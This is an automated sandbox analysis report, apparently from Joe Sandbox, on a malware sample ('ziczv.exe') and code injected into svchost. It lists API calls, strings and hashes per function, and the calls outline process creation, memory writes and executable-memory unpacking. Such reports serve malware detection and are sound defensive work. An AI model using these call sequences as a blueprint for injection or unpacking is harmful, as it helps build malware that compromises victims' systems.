Instruction ID: f5ff906494048a49fff03d0d3e75330f5b41f1d29ceb23ad09b9139cdb35cb4d
Opcode Fuzzy Hash: d48ea19a26195e2f84bc7a3a71b9155d586698f3429874a8d89c46db6d38b9c9
Instruction Fuzzy Hash: 1C515EB1A5474AAFE7209F25CC44F27FBECFB84685F04492EBA96C2140D774D818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02F73923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 02F7392F
memset.MSVCRT ref: 02F73983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 02F739B3

Strings

D, xrefs: 02F7398B

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: dda8de809fb39c1817d62c6f4e7208a77cae8855853a0963001a3af140749610
Instruction ID: a13c3e1a49563bd10d1f5b47897b7b8bb9c8805f3247d21d643fc73a1c3c5954
Opcode Fuzzy Hash: dda8de809fb39c1817d62c6f4e7208a77cae8855853a0963001a3af140749610
Instruction Fuzzy Hash: 0D118172914319ABC710AF21DC04D5BFBADEB85AE4F020A2AFE5592150D73299189BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02F74EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02F74EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02F74F35

Part of subcall function 02F749EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000), ref: 02F74A7A
Part of subcall function 02F749EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000,?,?,?), ref: 02F74A81
Part of subcall function 02F749EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000), ref: 02F74A92
Part of subcall function 02F749EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000,?,?,?), ref: 02F74A99

ResumeThread.KERNEL32(02F749A2,?,?,?), ref: 02F74F51
CloseHandle.KERNEL32(02F749A2,?,?,?), ref: 02F74F5A

Strings

D, xrefs: 02F74F02

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: 7b6851ad2e07410d81f6d95fedd9f19fcee228e1f4788d48bcd7a72c3795d23c
Instruction ID: 55e162b64d8ed1171db0ab6796a5d573c51752b1c63a64c9ad74203cc81934fb
Opcode Fuzzy Hash: 7b6851ad2e07410d81f6d95fedd9f19fcee228e1f4788d48bcd7a72c3795d23c
Instruction Fuzzy Hash: 2D0100B290421CBFEB40AAE8DC85DEFB7BDFB48384F000426F705E6050E6719D188B62

Uniqueness

Uniqueness Score: -1.00%

Function 02F727E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02F727F9
CreateProcessW.KERNEL32(00000000,02F762F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02F72825
ExitProcess.KERNEL32 ref: 02F7282C

Strings

D, xrefs: 02F72800

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: 41ef6f89e81a9072231dd7db62ad557df99af8c451c7702a35085b69c027291b
Instruction ID: ab0efc2745cd583bc5e63dfc9eb65dff7ed479eb4c4b3e412ae6d7e5ef18d8ac
Opcode Fuzzy Hash: 41ef6f89e81a9072231dd7db62ad557df99af8c451c7702a35085b69c027291b
Instruction Fuzzy Hash: 62E0EDB184064C7EE740EAF8CD85EAFF7BCAB08744F000835B706E6050D6789E1C8A66

Uniqueness

Uniqueness Score: -1.00%

Function 02F75208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F7525E
Sleep.KERNEL32(00001388), ref: 02F75271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F7528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02F75327
GetProcessHeap.KERNEL32(00000000,?), ref: 02F75333

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: aa32fd37eba33ef804e89a7caa46a4fccac8b39e213bc617f1845b4163b4d628
Instruction ID: 696f84d0e0002ea5d4d72118549de238d43c694de69b267dbc13d6d1a7ff708c
Opcode Fuzzy Hash: aa32fd37eba33ef804e89a7caa46a4fccac8b39e213bc617f1845b4163b4d628
Instruction Fuzzy Hash: 6F4103729043049FD720DFA4CC48B6BB7E9EF48399F440E1EFA9992190DB70D508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02F75B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02F75B64

Part of subcall function 02F72F1A: CryptAcquireContextW.ADVAPI32(02F77658,00000000,00000000,00000001,F0000000,02F762B0,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F35
Part of subcall function 02F72F1A: CryptCreateHash.ADVAPI32(02F77658,00008003,00000000,00000000,?,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F52
Part of subcall function 02F72F1A: CryptHashData.ADVAPI32(?,02F77658,?,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F68
Part of subcall function 02F72F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F83
Part of subcall function 02F72F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02F75B88,?,00000000,?), ref: 02F72FA3
Part of subcall function 02F72F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72FB3
Part of subcall function 02F72F1A: CryptReleaseContext.ADVAPI32(02F77658,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72FC2

Part of subcall function 02F744D2: wsprintfA.USER32 ref: 02F74509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02F75BF4

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: 6684bce03a9d67e28d4f3b42a92b64d6bd6f8c42848c69d8ad8fc3d83a2e6852
Instruction ID: ffa9925906914886cf614f90b541b57f0cd60bcceeea746a615a4d57b61eefb7
Opcode Fuzzy Hash: 6684bce03a9d67e28d4f3b42a92b64d6bd6f8c42848c69d8ad8fc3d83a2e6852
Instruction Fuzzy Hash: 9821E1738542089EEB11DFA8DC84EFEBBACEB04390F540467FE05D6101D720E548CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F73803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02F73904,?,00000000,00000000,00000000,00000007,?,?), ref: 02F73855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02F73904), ref: 02F7385C

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 7738032a030666d50e251823a65f348dd5e60227c808d27eafa6a27e073ac374
Instruction ID: 44feabd91133e07189235a7536fc94132d3145dedfee19b67509c1fad87f6c8d
Opcode Fuzzy Hash: 7738032a030666d50e251823a65f348dd5e60227c808d27eafa6a27e073ac374
Instruction Fuzzy Hash: 5811BE73E50305AFD7309E68D844F66B7E9EF89685F1848AEE6D2C7204D770E445DB10

Uniqueness

Uniqueness Score: -1.00%

Function 02F7540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 02F7542D
RtlAllocateHeap.NTDLL(00000000), ref: 02F75434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F75496
HeapFree.KERNEL32(00000000), ref: 02F7549D

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 8badfb036f73fb252800fd0257c45adac0208d41b64b84e4183888c2f0207640
Instruction ID: 0fb02bfd0936ad6e6fbf5b8e36fc2613c733093eabb07db9f049cf3d94c94494
Opcode Fuzzy Hash: 8badfb036f73fb252800fd0257c45adac0208d41b64b84e4183888c2f0207640
Instruction Fuzzy Hash: 6F110677E002086BDB11AFA89D48EA7F76DAB88691F444577FF59D7204DB30D80487B0

Uniqueness

Uniqueness Score: -1.00%

Function 02F74AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000), ref: 02F74AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02F74ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02F74B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02F74B11

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 4a8acee0a67a897ba078f5cbb6895b020cbb139d52dde57f3dc9777b064994ce
Instruction ID: 39aed9fb7e5eef70c9651fe83f0dccbd17cc79348dde538c020ec22ce9dabb82
Opcode Fuzzy Hash: 4a8acee0a67a897ba078f5cbb6895b020cbb139d52dde57f3dc9777b064994ce
Instruction Fuzzy Hash: 50112A75A40702ABFB61AF74EC05B12B7F4AB04784F09892AF786C6194EB71D414DB14

Uniqueness

Uniqueness Score: -1.00%

Function 02F71496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F714DF
HeapFree.KERNEL32(00000000), ref: 02F714E6

Strings

!, xrefs: 02F714C6
!, xrefs: 02F714A3

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: 8fe125a18234bf7f13e4707356933befd812ad095afd8696ee96a2fc37381983
Instruction ID: aa6069d36a5fe3b9e7fbbfb763ece97ec20a1038f16ebed2138a143aa371bd84
Opcode Fuzzy Hash: 8fe125a18234bf7f13e4707356933befd812ad095afd8696ee96a2fc37381983
Instruction Fuzzy Hash: 64F09032B942186EFB106E74DD49FF77B9DEB067D0F484422FE08C5280EAB0D994C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 02F725E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02F77328), ref: 02F725F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02F72612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02F72623
GetLastError.KERNEL32 ref: 02F7262D

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: 44ec07048b8c18563e2a0e81559a765602ea568481f75deb7bdf6a4251271f76
Instruction ID: 066935eeb9331e881d3c21d5041dbe4bc4a7a79a662811156b593dd0f089f7a0
Opcode Fuzzy Hash: 44ec07048b8c18563e2a0e81559a765602ea568481f75deb7bdf6a4251271f76
Instruction Fuzzy Hash: A4F03032A54249ABEB2066B69C4DEAFFBBCEBC5B45F40442FF905C1140EB1594188A31

Uniqueness

Uniqueness Score: -1.00%

Function 02F749EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000), ref: 02F74A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000,?,?,?), ref: 02F74A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000), ref: 02F74A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02F74F4C,?,00000000,?,?,?), ref: 02F74A99

Part of subcall function 02F74B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02F74C69

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: bc8015a8e7e41a191591d947f8d40113f954a27110e0c1fcb6107673bc1fb11e
Instruction ID: d4703ce89a1a16aa328300232a00e59e96fd5d4480c2f48ce3501dd8c70469cb
Opcode Fuzzy Hash: bc8015a8e7e41a191591d947f8d40113f954a27110e0c1fcb6107673bc1fb11e
Instruction Fuzzy Hash: EB211D76C083569FC310DFA4D84494BFBE9FB88694F04491EF689D7200D734D9448B86

Uniqueness

Uniqueness Score: -1.00%

Function 02F7136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F713EC
HeapFree.KERNEL32(00000000), ref: 02F713F3

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 407632aaec52994435f2082ec87d1e32f5f9beb74167bd6e1b1d852a32f6e621
Instruction ID: f10fe978af3fe88978ed53080c8d2d1353ff5c3a3154035c3b38af312b77dd30
Opcode Fuzzy Hash: 407632aaec52994435f2082ec87d1e32f5f9beb74167bd6e1b1d852a32f6e621
Instruction Fuzzy Hash: 92112176E44209ABDF50DFE58884BDFBBBCEB48691F104567E708E2100E77186588BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F71404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F7146A
HeapFree.KERNEL32(00000000), ref: 02F71471
GetProcessHeap.KERNEL32(00000000,?), ref: 02F7147E
HeapFree.KERNEL32(00000000), ref: 02F71485

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 9433f7b113daa3b9a90160fcfa244a3604340796f3023de4770883cf91d9981f
Instruction ID: da01ea45e68955e57e45a7903f334a7858b00af92371e7c6da8d2dc17e19ee14
Opcode Fuzzy Hash: 9433f7b113daa3b9a90160fcfa244a3604340796f3023de4770883cf91d9981f
Instruction Fuzzy Hash: 3F112172D0020DABDB009FE99948BDFFBBCFF09794F10456BEA09A3100D77596588BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F71F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02F71CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02F71CFD
Part of subcall function 02F71CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02F71D04
Part of subcall function 02F71CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02F71D2D
Part of subcall function 02F71CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02F71DF6
Part of subcall function 02F71CD5: HeapFree.KERNEL32(00000000), ref: 02F71DFD
Part of subcall function 02F71CD5: Sleep.KERNEL32(00001388), ref: 02F71E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02F71FB4
HeapFree.KERNEL32(00000000), ref: 02F71FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02F71FC3
HeapFree.KERNEL32(00000000), ref: 02F71FCA

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: 188ee2e7411d83947d5369147bb9f83bb326fe40550f3b258fb67d4258af4a1c
Instruction ID: edd144c51d0ebf0fdee8ec422933b017eb70a1044b3021c3172eab43bc9143b8
Opcode Fuzzy Hash: 188ee2e7411d83947d5369147bb9f83bb326fe40550f3b258fb67d4258af4a1c
Instruction Fuzzy Hash: 6C01E9718083499FD710DFA6D808A9BFBE8FB4C254F00491EF69992200E735E218CF96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ziczv.exePID: 3772, Parent PID: 1088COMMON

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 2, xrefs: 0040112E
Stop ok, xrefs: 00401180
Stop Err, xrefs: 00401187
Start, xrefs: 00401167
fail 1, xrefs: 0040114E
fail 3, xrefs: 004010E9

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 006F04F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,006F0000), ref: 006F05D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,006F003A), ref: 006F060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 006F066F
VirtualFree.KERNELBASE(00710000,00000000,00008000), ref: 006F06A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,006F04CF), ref: 006F07B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,006F04CF), ref: 006F07DB

Part of subcall function 006F03A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 006F03DA

VirtualProtect.KERNELBASE(00400000,?,00000002,006F04CF), ref: 006F08A1
VirtualProtect.KERNELBASE(00400000,?,00000002,006F04CF,?), ref: 006F08F7
VirtualFree.KERNELBASE(00710000,00000000,00008000), ref: 006F091B

Memory Dump Source

Source File: 00000016.00000002.2451764821.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f0000_ziczv.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: f948f566381ca0f595c14c07fe2ada2e2da929fbb52514a1d9b6d335d2e1dd9c
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 38D15C727002009FFF15EF54CC80F6177A6FF64710B990298EE0D9F66ADA70A921CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 00000016.00000002.2451511987.0000000000421000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_421000_ziczv.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2451274460.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451326569.0000000000402000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451350698.0000000000403000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2451366054.0000000000404000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_ziczv.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
